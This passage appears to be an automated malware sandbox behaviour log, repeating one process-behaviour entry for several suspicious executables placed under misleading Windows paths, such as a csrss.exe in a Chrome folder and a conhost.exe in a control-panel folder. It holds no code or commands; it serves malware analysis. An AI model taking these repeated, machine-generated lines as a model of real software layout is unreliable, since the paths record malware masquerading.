                    Source: C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeProcess information set: NOOPENFILEERRORBOX
